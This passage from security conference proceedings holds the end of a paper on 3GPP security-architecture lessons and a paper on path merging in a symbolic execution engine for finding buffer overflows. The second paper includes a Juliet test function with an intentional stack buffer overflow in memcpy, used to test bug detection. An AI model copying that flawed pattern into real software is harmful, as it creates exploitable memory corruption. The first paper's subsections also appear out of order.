Assumptions three and four are apparently somewhat at odds, but in the end assumption three can be supported given that these means are complementary and cost-effective. See also the considerations about the economy of attacks and defenses outlined in [21]. This indicates that for broad sweeping attacks, even quite weak mechanisms may successfully thwart the attacks. Measures that are only effective for one specific attack should be avoided.
E. Other Concerns
1) Passive Regulatory Authorities: One main concern is
that the regulatory authorities generally are quite passive with
regard to security requirements. This is apparent for the cellular
system and regulations concerning the operators. The 3GPP
standards are by no means perfect or complete, but it is still the
case that many of the standardized and recommended security
mechanisms are not deployed in the networks. The regulatory
authorities are generally more reactive than proactive, unless
they have a clear political mandate to be stringent. One should
also be concerned about regulations enacted just after a major public incident, since it is likely that the urge to “do something” is strong and that one focuses narrowly on details. One may end up with security theater, as coined by Schneier [22].
Part of this problem is that one sometimes ends up devoting a lot of attention to correcting and strengthening unimportant features. To do something right is not enough; one must also do the right thing.
2) False Security: Security theater may over time develop
into the more elaborate cargo cult security type of deception.
Then the main functions and mechanisms may all be there
(or mimicked closely), but with some vital part missing or
done completely wrong. Cargo cultism is defined by “perfect
form”, but it simply does not work as intended. Feynman has
an amusing description of “cargo cult science” that nicely
illustrates the principles [23]. Since security can be very
difficult to get right and to verify, cargo cult security may
look like the real deal.
3) Security Testing and Security Configuration: In [7], the authors also clearly demonstrate not only that not all security options are exercised, but that, unsurprisingly, there are implementation weaknesses and vulnerabilities. The ASMONIA project provides many more examples of weaknesses, vulnerabilities and risks facing a mobile system [24]. The ASMONIA project published a lot of useful documents for operators wanting to improve their security level. The documents also include advice and methods for how to test the security. The EU body ENISA provides a lot of useful security-related input, but generally has no mandate to impose security [25]. When
it comes to IP network security and server security there is a
large body of standards and methods for how to design and test
security hardening [26–29]. There are also various checklists
available [30].
V. LESSONS LEARNED
Security policies will be affected by changes to these assumptions. This is a process-oriented task that must take place both in the design phase and for the deployed system(s).
B. Rock Solid Bootstrapping Security
There needs to be a rock solid fundament that will be
secure for the foreseeable future. The smart-card has served
this purpose in the 3GPP systems on the subscriber side. The
smart-card is not tamper-proof, but it has successfully served
as a high-trust platform.
C. Planned Deprecations
A scalable and evolving system must be able to handle
deprecation of almost all cryptographic algorithms, security
protocols and security services. The deprecation, needless
to say, must be conducted in a secure manner. Backwards
compatibility requirements and fallback solutions must be
handled in a secure way.
D. Negotiable and Adaptable
Given that one must plan for deprecation of security
features/services, one must also plan how to negotiate new
features/services. This feature must be built-in and have high
assurance. Adaptation may be necessary to account for local
requirements, but it is vital that adaptations be fully compliant with a well-defined security policy.
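As a hedged illustration of such built-in negotiation (this is not any actual 3GPP mechanism; the algorithm identifiers and the preference ordering are invented for this sketch), a negotiation step can pick the most preferred mutually supported algorithm while refusing to fall back to deprecated ones:

```c
#include <stddef.h>

/* Invented algorithm identifiers, ordered roughly by strength. */
enum alg { ALG_NULL = 0, ALG_LEGACY = 1, ALG_CURRENT = 2, ALG_STRONG = 3 };

static int supports(const enum alg *list, size_t n, enum alg a) {
    for (size_t i = 0; i < n; i++)
        if (list[i] == a) return 1;
    return 0;
}

/* Walk the local preference list (strongest first; deprecated algorithms
 * have been removed from it entirely) and return the first algorithm the
 * peer also supports; -1 if there is no acceptable overlap. */
int negotiate(const enum alg *local_pref, size_t nl,
              const enum alg *peer, size_t np) {
    for (size_t i = 0; i < nl; i++)
        if (supports(peer, np, local_pref[i]))
            return (int)local_pref[i];
    return -1; /* no acceptable common algorithm: refuse, do not fall back */
}
```

Because deprecated algorithms are simply absent from the local preference list, a bidding-down attempt by a peer offering only legacy algorithms fails closed instead of silently succeeding.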
E. Proactive & Reactive Security
Basic security functionality to identify and authenticate
principals and entities is necessary, but not sufficient. Adding
authorization, protected storage and protected communication is
also necessary, but still not sufficient. More may be added,
but in the end it is impossible to fully secure the system.
This means that one must handle and deal with incidents.
There is therefore a clear need for intrusion detection and
response systems, to deploy firewalls, anti-virus protection,
secure backups, secure audit trails etc. The reactive measures
must be included in the overall system security plans and
subject to revisions as need be.
F. Stability, Resilience and Recovery
System integrity is imperative to ensure a stable and resilient system. It is a system-level characteristic
and does not preclude partial or local failures. What is imperative is to prevent failures from scaling. Failures, whether man-made intentional or unintentional, cannot be entirely prevented.
Procedures that support mitigation and recovery must be an
integral part of the overall system security plan.
G. Configuration Management
Proper planned configuration management, which must
include security functionality, is an absolute necessity.
A. Verify Assumptions

One must verify assumptions about the system and its
security periodically, or whenever there are substantial changes to
the system. That is, an audit is called for to verify assumptions
about the assets, the principal entities, trust relationships, etc.

H. Privacy Matters

Privacy is a feature that must be accounted for in all
systems that include human users or any kind of data pertaining
to humans. It must be planned for from the design phase
and handled in all phases of system deployment.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
VI. CONCLUDING REMARKS
The results in this paper cannot be said to be fully
supported by the evidence provided in this paper (or in the
referenced papers). They are neither rigorous nor complete.
This is to be expected for such a complex issue. Thus, while
the results may be valid and true, they will hardly be complete
and not always necessary either. That is, the usual “necessary
and sufficient” conditions are not really there. Still, experience
and empirical evidence should not be discounted, and we
advocate that the lessons learned are taken into account, not as
mathematical axioms, but inputs to be considered. We therefore
recommend that scalable evolving security architectures should
be designed with these assumptions as background.
In this paper, we have outlined the 3GPP security architecture as it has evolved over more than 25 years. From being an
auxiliary service for the few, it has grown to literally cater to
billions of subscribers, and the number and types of services
provided have changed dramatically over the years. The use patterns of these systems have changed as well. All in all, there
has been a complete transformation of almost all aspects of
these systems. During this process, the security architecture
has evolved with the system and the changing system context,
though not without some noticeable failures and a growing
number of security problems.
We have argued that to achieve scalable security architectures that are able to evolve over time, one needs to take into
account the fact that almost all assumptions one initially had
will become false or moot. This means that adaptability and
the ability to support changes are crucial. This is important in a
world where the internet-of-things (IoT) landslide is about to
happen and where the systems will be ever more important.
In the wake of the Snowden revelations, it is also clear that
cyber-security is under constant pressure, and while we do not
want to over-state the Snowden case per se, it should be clear
that cyber-war methods will (over time) become available
to many organizations and individuals. So we need to learn
how to cope with this, and to do so fast.
REFERENCES
[1] European Parliament/European Council, “Directive 2006/24/EC of the
European Parliament and of the Council of 15 March 2006 on the
retention of data generated or processed in connection with the provision
of publicly available electronic communications services or of public
communications networks and amending Directive 2002/58/EC,” EU,
Directive 24/EC, 2006.
[2] 3GPP, TS 43.020, “Security related network functions,” 3GPP, France,
TS 43.020 (2G), 2014.
[3] J. R. Rao, P. Rohatgi, H. Scherzer, and S. Tinguely, “Partitioning attacks:
or how to rapidly clone some GSM cards,” in Security and Privacy, 2002.
Proceedings. 2002 IEEE Symposium on. IEEE, 2002, pp. 31–41.
[4] M. Kalenderi, D. Pnevmatikatos, I. Papaefstathiou, and C. Manifavas,
“Breaking the GSM A5/1 cryptography algorithm with rainbow tables and
high-end FPGAs,” in Field Programmable Logic and Applications (FPL),
2012 22nd International Conference on. IEEE, 2012, pp. 747–753.
[5] P. Papantonakis, D. Pnevmatikatos, I. Papaefstathiou, and C. Manifavas,
“Fast, FPGA-based rainbow table creation for attacking encrypted mobile communications,” in Field Programmable Logic and Applications
(FPL), 2013 23rd International Conference on. IEEE, 2013, pp. 1–6.
[6] G. M. Køien, Entity authentication and personal privacy in future
cellular systems. River Publishers, 2009, vol. 2.
[7] F. van den Broek, B. Hond, and A. Cedillo Torres, “Security Testing of
GSM Implementations,” in Engineering Secure Software and Systems,
ser. Lecture Notes in Computer Science, J. Jürjens, F. Piessens, and
N. Bielova, Eds. Springer International Publishing, 2014, vol. 8364,
pp. 179–195.
[8] G. M. Køien, “An introduction to access security in UMTS,” Wireless
Communications, IEEE, vol. 11, no. 1, Feb 2004, pp. 8–18.
[9] V. Niemi and K. Nyberg, UMTS Security. John Wiley & Sons, 2003.
[10] 3GPP, TS 33.102, “3G Security; Security architecture,” 3GPP, France,
TS 33.102 (3G), 2014.
[11] 3GPP, TS 33.120, “Security Objectives and Principles,” 3GPP, France,
TS 33.120 (3G), 2001.
[12] 3GPP, TS 21.133, “3G security; Security threats and requirements,”
3GPP, France, TS 21.133 (3G), 2001.
[13] 3GPP, TS 33.210, “3G security; Network Domain Security (NDS); IP
network layer security,” 3GPP, France, TS 33.210 (NDS/IP), 2012.
[14] 3GPP, TS 33.310, “Network Domain Security (NDS); Authentication
Framework (AF),” 3GPP, France, TS 33.310 (NDS/AF), 2014.
[15] G. M. Køien, “Privacy enhanced cellular access security,” in Proceedings
of the 4th ACM Workshop on Wireless Security. ACM, 2005, pp. 57–66.
[16] D. Forsberg, G. Horn, W.-D. Moeller, and V. Niemi, LTE Security. John
Wiley & Sons, 2012, vol. 1.
[17] 3GPP, TS 33.401, “3GPP System Architecture Evolution (SAE); Security
architecture,” 3GPP, France, TS 33.401 (3G), 2014.
[18] G. M. Køien, “Privacy enhanced mutual authentication in LTE,” in
Wireless and Mobile Computing, Networking and Communications
(WiMob), 2013 IEEE 9th International Conference on. IEEE, 2013,
pp. 614–621.
[19] G. Køien, “Mutual entity authentication for LTE,” in Wireless Communications and Mobile Computing Conference (IWCMC), 2011 7th
International. IEEE, 2011, pp. 689–694.
[20] D. Dolev and A. C. Yao, “On the Security of Public-Key Protocols,”
IEEE Transactions on Information Theory, vol. 29, no. 2, Mar 1983, pp.
198–208.
[21] D. Florêncio and C. Herley, “Where do all the attacks go?” in Economics
of Information Security and Privacy III. Springer, 2013, pp. 13–33.
[22] B. Schneier, Beyond Fear. Copernicus Books, New York, 2003.
[23] R. P. Feynman, “Cargo cult science,” in Surely You’re Joking, Mr.
Feynman!, 1st ed. W. W. Norton, 1985; originally a 1974 Caltech
commencement address.
[24] “The ASMONIA project,” www.asmonia.de, 2014.
[25] “ENISA - European Union Agency for Network and Information
Security,” www.enisa.europa.eu/, 2014.
[26] K. Scarfone, W. Jansen, and M. Tracy, “Guide to General Server
Security,” NIST, Gaithersburg, MD 20899-8930, Special Publication
800-123, 2008.
[27] Z. Anwar, M. Montanari, A. Gutierrez, and R. H. Campbell, “Budget
constrained optimal security hardening of control networks for critical
cyber-infrastructures,” International Journal of Critical Infrastructure
Protection, vol. 2, no. 1, 2009, pp. 13–25.
[28] R. Dewri, I. Ray, N. Poolsappasit, and D. Whitley, “Optimal security
hardening on attack tree models of networks: a cost-benefit analysis,”
International Journal of Information Security, vol. 11, no. 3, 2012, pp.
167–188.
[29] R. Dewri, N. Poolsappasit, I. Ray, and D. Whitley, “Optimal security
hardening using multi-objective optimization on attack tree models of
networks,” in Proceedings of the 14th ACM Conference on Computer
and Communications Security. ACM, 2007, pp. 204–213.
[30] NIST, “Security configuration checklists program,” http://csrc.nist.gov/groups/SNS/checklists/, 2014.
A Backtracking Symbolic Execution Engine
with Sound Path Merging
Andreas Ibing
Chair for IT Security
TU München, Germany
Email: andreas.ibing@tum.de
Abstract—Software vulnerabilities are a major security threat and
can often be exploited by an attacker to intrude into systems.
One approach to mitigation is to automatically analyze software
source code in order to find and remove software bugs before
release. A method for context-sensitive static bug detection is
symbolic execution. If applied with approximate path coverage,
it faces the state explosion problem. The number of paths in
the program execution tree grows exponentially with the number
of decision nodes in the program for which both branches are
satisfiable. In combination with the standard approach using
the worklist algorithm with state cloning, this also leads to
exponential memory consumption during analysis. This paper
considers a source-level symbolic execution engine which uses
backtracking of symbolic states instead of state cloning, and
extends it with a sound method for merging redundant program
paths, based on live variable analysis. An implementation as a plug-in extension of the Eclipse C/C++ development tools (CDT) is
described. The resulting analysis speedup through path merging
is evaluated on the buffer overflow test cases from the Juliet test
suite for static analyzers on which the original engine had been
evaluated.
Keywords–Static analysis; Symbolic execution.
I. INTRODUCTION
Software vulnerabilities such as buffer overflows can in
many cases be exploited by an attacker for remote code execution. Automated bug detection, both during software development
and for releases, is a main component of application security
assurance.
Symbolic execution [1] is a static program analysis method,
where software input is regarded as variables (symbolic values). It is used to automatically explore different paths through
software, and to compute path constraints as logical equations
(from the operations with the symbolic input). An automatic
theorem prover (constraint solver) is then used to check program paths for satisfiability and to check error conditions for
satisfiability. The current state of the art in automatic theorem
provers is Satisfiability Modulo Theories (SMT) solvers [2]; the
standard interface is SMT-LIB [3]. An example state-of-the-art
solver is Z3 [4].
Automatic analysis tools which rely on symbolic execution
have been developed for the source-code level, intermediate
code and binaries (machine code). Available tools mostly
analyze intermediate code, which exploits a small instruction
set and certain independence of programming language and
target processor. Examples are [5] and [6]; the latter analyzes
LLVM code [7]. An overview of available tools is given in
[8][9][10]. Symbolic execution on the source-code level is also
interesting for several reasons. An intermediate representation
loses source information by discarding high-level types and the
compiler lowers language constructs and makes assumptions
about the evaluation order. However, rich source and type
information is needed to explain discovered bugs to the user
[11] or to generate quick-fix proposals. An example of a
source-level symbolic execution engine for C/C++ is [12],
which uses the parser and control flow graph (CFG) builder
from Eclipse CDT [13].
During symbolic execution, the engine builds and analyzes
satisfiable paths through programs, where paths are lists of
CFG nodes. Always restarting symbolic execution from the
program entry point for different, partly overlapping program
paths (path replay) is obviously inefficient. The standard
approach is therefore the worklist algorithm [14]. Symbolic
program states of frontier nodes (unexplored nodes) of the
program execution tree are kept in memory, and at program
branches the respective states are cloned. The reuse of intermediate analysis results with state cloning has the downside of
being memory-intensive. [5] uses state cloning with a recursive
data structure to store only state differences. Another approach
for engine implementation is symbolic state backtracking [12].
It keeps only the symbolic program states along the currently
analyzed program path in memory (stored incrementally with
single assignments) and avoids the inefficiency of path replay
as well as the exponential memory consumption of state
cloning.
The program execution tree grows exponentially with the
number of decisions in the program for which both branches
are satisfiable. Straightforward application of symbolic execution with approximate path coverage (where the number of
unrolled loop iterations is bounded) is therefore not scalable.
This is often called the path explosion problem. In [15] it
is noted that program paths can be merged when the path
constraints differ only in dead variables, because further path
extension would have the same consequences for the paths.
It presents an implementation which extends [5]. This implementation uses a cache of observed symbolic program states
and introduces a type of live variables analysis which it calls
read-write-set (RWSet) analysis.
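The exponential growth described above can be made concrete with a one-line sketch (in C, purely illustrative): with d decision nodes whose branches are both satisfiable, the execution tree splits into 2^d leaf paths, matching the 2^3 = 8 leafs of Figure 1.

```c
/* Number of leaf paths in the execution tree when d decision nodes each
 * have two satisfiable branches: every such decision doubles the count. */
unsigned long leaf_paths(unsigned d) {
    return 1UL << d;
}
```

Merging paths back together at common points (such as function exits) is what folds this tree and counters the doubling.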
Interesting properties of bug detection algorithms are
soundness (no false negative detections) and completeness (no
false positives). Because a bug checker cannot be sound and
complete and have bounded runtime, in practice bug checkers
are evaluated by measuring false positive and false negative
detections and the corresponding runtimes on a sufficiently large bug test suite. The currently most comprehensive
Figure 1. Sequence of three decisions and corresponding branches (left); the
execution tree under the assumption that all branches are satisfiable splits
into 2^3 = 8 leafs (middle); path merging folds the execution tree (right).
C/C++ bug test suite for static analyzers is the Juliet suite [16].
Among other common software weaknesses [17] it contains
buffer overflow test cases. In order to systematically measure
false positives and false negatives, it contains both ’good’ and
’bad’ functions, where ’bad’ functions contain a bug. It further
combines ’baseline’ bugs with different data and control flow
variants to cover the language's grammar constructs and to test
the context depth of the analysis. The maximum context depth
spanned by a flow variant is five functions in five different
source files.
This paper develops and evaluates a sound path merging
method in a source-level backtracking symbolic execution engine. The implementation extends [12]. The remainder of this
paper is organized as follows. Section II describes the design
decisions. Section III gives an overview of the implementation
in Eclipse CDT. Section IV presents results of experiments
with buffer overflow test cases from the Juliet suite. Section
V discusses related work and section VI then discusses the
presented approach based on the results.
Figure 2. Control flow graph for the example function from Figure 3, with
buffer overflow in the then branch.
II. MERGE POINTS AND CONTEXT CACHE
A. Dead and live variables
Paths can be merged without any loss in bug detection
accuracy when the path constraints differ only in dead variables. The detection of such merge possibilities requires a
context cache at potential merge points. Also required is a
way to detect dead variables and to filter them from the path
constraint. Potentially interesting merge points are therefore
program locations where the sets of dead and live variables
change. Such points are function start and function exit and
after scope blocks like if / else or switch statements and
loops.
B. Design decisions

The idea of merging program paths during symbolic execution is illustrated in Figure 1. The left of the figure
shows a control flow with a sequence of three decisions and
corresponding branches. For the assumption that all branches
are satisfiable, the middle of the figure shows the execution
tree, which splits into 2^3 = 8 leafs. The right of the figure
illustrates how path merging potentially folds the execution
tree together again. In this work, path merges are performed
at function exit. Merges are possible because stack frame
variables die at function exit. A path constraint at function exit
is treated as a concatenation of the function's call context and the
local context. The approach misses possibilities to merge paths
earlier, after scope blocks inside one function. On the other
hand, it does not require more complex live variable analysis
at intermediate points. The approach merges paths which have
split inside the same function, possibly with other function
calls in between. It needs to know the set of variables which
have been written since the merge paths have split. This is
overapproximated by the set of variables written since entering
the function which is left at the program location in question.
A set of potentially read variables along path extensions is not
computed. From the set of variables which have been written
as local context (i.e., since function entry), global variables,
the return value and all variables which have been written
through pointers (pointer escape, potential write to another stack
frame etc.) are assumed as live. The remaining written local
variables are soundly assumed as dead. The local context is
then reduced by removing the dead variables. A context cache
is used to look up observed reduced local contexts from pairs
of a function's exit node (in the function's control flow graph)
and call context. During symbolic execution, at each exit node
the context cache is queried for a merge possibility. Then, the
current path is pruned (merged) if possible; otherwise the local
reduced context is added as a new entry to the context cache.
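A minimal sketch of this reduction, with invented struct fields standing in for the engine's bookkeeping: only writes to globals, writes through pointers, and the return value survive the filtering, while the remaining local writes are soundly dropped as dead.

```c
#include <stddef.h>

/* Invented bookkeeping record for one variable written since function
 * entry; the real engine derives this information from its action log. */
struct written_var {
    const char *name;
    int is_global;
    int via_pointer;   /* pointer escape: may target another stack frame */
    int is_return_val;
};

/* Copy the potentially live entries of ctx[0..n) into out and return the
 * reduced size; purely local writes are dropped as dead. */
size_t reduce_local_context(const struct written_var *ctx, size_t n,
                            struct written_var *out) {
    size_t m = 0;
    for (size_t i = 0; i < n; i++)
        if (ctx[i].is_global || ctx[i].via_pointer || ctx[i].is_return_val)
            out[m++] = ctx[i];
    return m;
}
```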
III. IMPLEMENTATION IN ECLIPSE CDT
A. Symbolic execution with symbolic state backtracking
This subsection briefly reviews [12], which the paper at hand
extends with path merging functionality. The
backtracking symbolic execution engine [12] uses Eclipse
CDT's C/C++ parser to construct abstract syntax trees (AST)
from source code files. Control flow graphs (CFG) are then
constructed for function definitions rooted in AST subtrees.
CFG construction uses the ControlFlowGraphBuilder
class from CDT's code analysis framework (Codan [13]). The
symbolic interpretation is implemented according to the tree-based interpretation pattern from [18]; the translator class
extends CDT's ASTVisitor (visitor pattern [19]). The interpretation is symbolic, i.e., variable values are logic formulas.
Satisfiability queries to the SMT solver use the SMT-LIB
typedef struct charvoid {
    char x[16];
    void *y;
    void *z;
} charvoid;

void CWE121_memcpy_12_bad_simplified() {
    if (global_returns_t_or_f()) {
        charvoid cv_struct;
        cv_struct.y = (void *)SRC_STR;
        /* FLAW: Use the sizeof(cv_struct) which
           will overwrite the pointer y */
        memcpy(cv_struct.x, SRC_STR, sizeof(cv_struct));
        /* null terminate the string */
        cv_struct.x[(sizeof(cv_struct.x)/sizeof(char))-1] = '\0';
    }
    else {
        charvoid cv_struct;
        cv_struct.y = (void *)SRC_STR;
        /* FIX: Use sizeof(cv_struct.x) to avoid
           overwriting the pointer y */
        memcpy(cv_struct.x, SRC_STR, sizeof(cv_struct.x));
        /* null terminate the string */
        cv_struct.x[(sizeof(cv_struct.x)/sizeof(char))-1] = '\0';
    }
}
Figure 3. Simplified example function from [16], containing a buffer overflow
in the then branch. Corresponding CFG in Figure 2.
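The flaw can be quantified directly from the type definition: sizeof(cv_struct) counts the 16-byte array x plus the pointers y and z (and any padding), so the FLAW branch copies at least 2 * sizeof(void *) bytes past the end of x. A small sketch (reusing the struct from the listing, without performing the overflow):

```c
#include <stddef.h>

typedef struct charvoid {
    char x[16];
    void *y;
    void *z;
} charvoid;

/* Number of bytes the FLAW memcpy writes past the end of member x:
 * the whole struct size minus the size of x alone. */
size_t overflow_bytes(void) {
    return sizeof(charvoid) - sizeof(((charvoid *)0)->x);
}
```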
sublogic of arrays, uninterpreted functions and nonlinear integer and real arithmetic (AUFNIRA). Backtracking is enabled
by a class ActionLog which records certain semantic actions
performed for CFG nodes on the current path (e.g., variable
creation or hiding). If for example a function exit is backtracked, the function’s stack frame with contained variables
must be made visible again. Dead variables are therefore not
garbage-collected, because this would impede backtracking. The
engine can further record and visualize explored parts
of a program execution tree. The engine was evaluated in
[12] by measuring detection accuracy (false positives and false
negatives) and run-times for the detection of buffer overflows
in Juliet test programs.
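A hedged sketch of the action-log idea described above (the struct names, sizes and the single action kind are assumptions for illustration, not the engine's actual classes): semantic actions on the current path are recorded, and backtracking undoes them in reverse order.

```c
#include <stddef.h>

enum action_kind { VAR_CREATED };

struct action { enum action_kind kind; int var_id; };

struct engine {
    struct action log[64];
    size_t log_len;
    int visible[16];   /* 1 if the variable var_id is currently in scope */
};

/* Record a "variable created" action and make the variable visible. */
void create_var(struct engine *e, int var_id) {
    e->visible[var_id] = 1;
    e->log[e->log_len++] = (struct action){ VAR_CREATED, var_id };
}

/* Backtrack to an earlier log position, undoing each recorded action. */
void backtrack_to(struct engine *e, size_t mark) {
    while (e->log_len > mark) {
        struct action a = e->log[--e->log_len];
        if (a.kind == VAR_CREATED)
            e->visible[a.var_id] = 0;   /* undo: variable leaves scope */
    }
}
```

The same undo discipline extends to other recorded actions (e.g., hiding a stack frame at a call), which is why dead variables must not be garbage-collected while the path may still be backtracked.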
B. Path merging
In this implementation, paths are merged at function exit.
The method can merge paths which have split since entering
the same function, with the possibility that several other
functions are called between entering and leaving the function.
Path merging needs knowledge about the sets of written
variables since path split. The implementation uses the class
ActionLog from [12] to derive this information. It contains
all writes to variables, including writes to globals and writes
through pointers (potentially to other stack frames). The action
log is looked through backwards up to the current function’s
CFG start node, and the reduced local context is built from
the variable declaration actions. The reduced local context is
obtained by removing all writes to variables if the variables
don’t have global scope, are not written through pointers and
are not the current function’s return value. This approach does
not necessitate a comparably more complex dead/live variable
analysis. Path merge possibilities are detected using a class
ContextCache, essentially a hash map: the keys are exit
nodes with function call context, the values are the observed
reduced local contexts. The context cache is queried at each
function exit (CFG exit node). Comparing the reduced local
contexts does not necessitate expensive calls to the SMT solver.
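The cache query can be sketched as follows (a linear scan over a fixed-size array stands in for the real hash map, and the field names are invented): a hit on an identical reduced context at the same exit node and call context means the current path can be pruned.

```c
#include <string.h>

/* One observed (exit node, call context) -> reduced local context entry;
 * the reduced context is represented here as a plain string for brevity. */
struct entry { int exit_node; int call_ctx; const char *reduced; };

struct context_cache { struct entry e[32]; size_t n; };

/* Returns 1 (merge: prune the current path) on a hit, 0 after inserting
 * the newly observed reduced context. */
int query_or_insert(struct context_cache *c, int exit_node, int call_ctx,
                    const char *reduced) {
    for (size_t i = 0; i < c->n; i++)
        if (c->e[i].exit_node == exit_node && c->e[i].call_ctx == call_ctx &&
            strcmp(c->e[i].reduced, reduced) == 0)
            return 1;               /* identical context already explored */
    c->e[c->n++] = (struct entry){ exit_node, call_ctx, reduced };
    return 0;
}
```

As in the paper, the comparison is purely syntactic on the reduced contexts, so no SMT solver call is needed to decide a merge.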
An example function is shown as a listing in Figure 3. It is
a simplified version of a ’bad’ function from one of the buffer
overflow test cases of the Juliet suite. The control flow graph
of this function is shown in Figure 2. The function contains a
decision node corresponding to an if/else statement, for
which both branches are satisfiable. The error location is
marked by red underlining in the branch on the right of Figure
2. and by a comment in the listing. For both branches, the
function only writes to stack variables, and the reduced local
context at function exit is the empty set. Merging the two
paths at function exit which have split at the decision node is
therefore clearly possible without missing any bug.
Path merging applies in the same way to branches which
belong to loops, when the loop iteration number depends on
program input (otherwise there would be only one satisfiable
sub-path through the loop). Symbolic execution is currently
applied with loop unrolling up to a maximum loop depth
bound. A path through a loop can therefore split into a
maximum number of paths equal to the loop unrolling bound.
Branch nodes in the CFG belonging to loop statements are
treated by symbolic execution just as branch nodes belonging
to if/else statements. The branch nodes also have the same
labels, ’then’ for the loop body and ’else’ to skip the
loop. The only difference is that loops have a connector node
with two incoming branches, which closes the loop before the
decision node. This however has no influence on the merging
of unrolled paths.
IV. EXPERIMENTS
Path merging is evaluated on the same buffer overflow test
programs from the Juliet suite as [12]. These programs contain
buffer overflows with the memcpy (18 programs) and fgets
(36 programs) standard library functions, and cover the Juliet
control and data flow variants for C (e.g., multipath loops and
function pointers). A screenshot of error reporting in the
CDT GUI is shown in Figure 7. The tests are run as JUnit
plug-in tests with Eclipse 4.3 on a 64-bit Linux kernel 3.2.0 and
an i7-4770 CPU. The same bug detection accuracy with and
without path merging is validated; there are no false positive
or false negative bug detections on the test set.
Figures 4. and 5. illustrate the merging of paths, which
corresponds to folding the execution tree. Figure 4. shows
the execution tree for a memcpy buffer overflow with flow
variant 12. This test program contains a ’good’ and a ’bad’
function, where both functions contain a decision node with
two satisfiable branches. The bad function is given in a
simplified version in Figure 3. The tree shows only decision
nodes and branch nodes. Figure 5. shows the same tree when
path merging is applied. Paths are merged at two points which
are indicated in the tree (the two function exits), and the
traversal of two subtrees is skipped.
Figure 4. Execution tree for test program CWE121_Stack_Based_Buffer_Overflow__char_type_overrun_memcpy_12 from [16], showing only
decision and branch nodes.
Figure 5. Effect of path merging for the test program of Figure 4. The execution tree is folded at two locations. The number of traversed satisfiable paths is
reduced from four to one.
TABLE I. Analysis runtime sums for the two test sets, with and without path merging.

                                            backtracking according to [12]    backtracking and path merging
  CWE121 memcpy (18 test programs)                     14.7 s                            15.3 s
  CWE121 CWE129 fgets (36 test programs)               80.7 s                            34.4 s
  Sum (54 test programs)                               95.4 s                            49.7 s
Figure 6. Analysis runtimes with and without path merging for 54 buffer
overflow test programs from [16], with corresponding control/data flow
variant numbers.

Figure 6 shows the analysis runtimes for the set of buffer
overflows with fgets, for the backtracking engine and for
backtracking with path merging. The figure uses a logarithmic
scale and contains values for 36 flow variants. Flow variants
in Juliet are not numbered consecutively, to leave room for
later insertions. Since path merging folds complete subtrees
of a program's execution tree, it has an exponential effect
on runtimes. This is exemplified by flow variant 12. While
merging paths for the memcpy buffer overflow with variant
12 reduces the runtime from 1.1 s to 0.8 s, the runtime for
the fgets buffer overflow is reduced from 22.8 s (the longest
analysis time for any tested program) to 1.7 s. This is because
the fgets program contains several other decision nodes with
two satisfiable branches.

The summed analysis runtimes for the two test sets are given
in Table I. For the memcpy overflows, path merging increases
the runtime slightly due to the overhead of computing
and comparing reduced local contexts. Most of the memcpy
programs do not contain a single decision for which both
branches are satisfiable, and therefore offer no merge possibilities.
The fgets test programs all contain such decisions, and their
summed runtime is reduced by path merging from 80.7 s to 34.4 s.
The summed runtime for the 54 programs without merging is 95.4 s,
while path merging reduces it to 49.7 s. The overall speedup
with path merging on the test set is therefore about two, which
is considerable for the tiny Juliet programs.

V. RELATED WORK

There is a large body of work on symbolic execution,
spanning over 30 years [10]. Dynamic symbolic execution
for test case generation for x86 binaries is presented in [20].
To reduce complexity, only variables which directly depend on
program input are modelled as symbolic, in order to find
exploitable bugs. Most tools perform symbolic execution on
an intermediate code representation. Apart from [6], where
LLVM intermediate code is analyzed using a worklist algorithm,
prominent symbolic execution engines are presented in [21]
and [22]. In [21], dynamic symbolic execution of the Common
Intermediate Language (MSIL/CIL) is performed for test case
generation. The engine described in [22] analyzes Java bytecode.
Sound path merging based on dead path differences is presented
in [15]; the implementation extends [6]. Merging of paths with
live differences is investigated in [23]. Path disjunctions are
used in the corresponding logic formulation passed to the solver.
Heuristics for path merging are presented, which aim at balancing
computational effort between the symbolic execution frontend
and the SMT solver backend. The implementation extends [6].
VI. C ONCLUSION
This paper described the extension of a source-level backtracking symbolic execution engine for C/C++ with path
merging functionality and its implementation in Eclipse CDT.
The evaluation with tiny test programs from the Juliet suite
already showed a significant speedup. For larger programs
path merging has an exponential effect on analysis runtimes
(exponential in the number of decision nodes with more than
one satisfiable branch). Future work might include extensions
in different directions. One is to investigate the effect of
additional merge points, for example at connector nodes after
if/else and switch statements and loops, A memoryefficient implementation of the context cache might exploit
redundant information due to shared sub-paths. The very
simple live variable analysis implementation can be improved
to find more merge possibilities. Inter-procedural live variable
analysis could find merge possibilities, e.g., in certain flow
variants with dead global variables. Another direction is the
extension to support path merging in the analysis of multithreaded code, in a straightforward combination with [24].
A way to make the analysis scalable in order to analyze
practical programs is to restrict the code coverage, for example,
to branch coverage. There are fewer merge possibilities when
coverage is restricted to fewer program paths, but path merging
remains applicable without changes.
ACKNOWLEDGEMENT
This work was funded by the German Federal Ministry of Education and Research (BMBF) under grant 01IS13020.
REFERENCES
[1] J. King, “Symbolic execution and program testing,” Communications
of the ACM, vol. 19, no. 7, 1976, pp. 385–394.
[2] L. de Moura and N. Bjorner, “Satisfiability modulo theories: Introduction
and applications,” Communications of the ACM, vol. 54, no. 9, 2011,
pp. 69–77.
[3] C. Barrett, A. Stump, and C. Tinelli, “The SMT-LIB standard version
2.0,” in Int. Workshop Satisfiability Modulo Theories, 2010.
[4] L. de Moura and N. Bjorner, “Z3: An efficient SMT solver,” in Tools
and Algorithms for the Construction and Analysis of Systems (TACAS),
2008, pp. 337–340.
[5] C. Cadar, V. Ganesh, P. Pawlowski, D. Dill, and D. Engler, “EXE:
Automatically generating inputs of death,” in 13th ACM Conference on
Computer and Communications Security (CCS), 2006, pp. 322–335.
[6] C. Cadar, D. Dunbar, and D. Engler, “KLEE: Unassisted and automatic
generation of high-coverage tests for complex systems programs,” in
USENIX Symposium on Operating Systems Design and Implementation (OSDI), 2008, pp. 209–224.
[7] C. Lattner and V. Adve, “LLVM: A compilation framework for lifelong
program analysis and transformation,” in Int. Symp. Code Generation
and Optimization (CGO), 2004, p. 75.
[8] C. Cadar et al., “Symbolic execution for software testing in practice –
preliminary assessment,” in Int. Conf. Software Eng., 2011, pp. 1066–
1071.
[9] C. Pasareanu and W. Visser, “A survey of new trends in symbolic
execution for software testing and analysis,” Int. J. Software Tools
Technology Transfer, vol. 11, 2009, pp. 339–353.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 7. Error reporting in the Eclipse GUI.
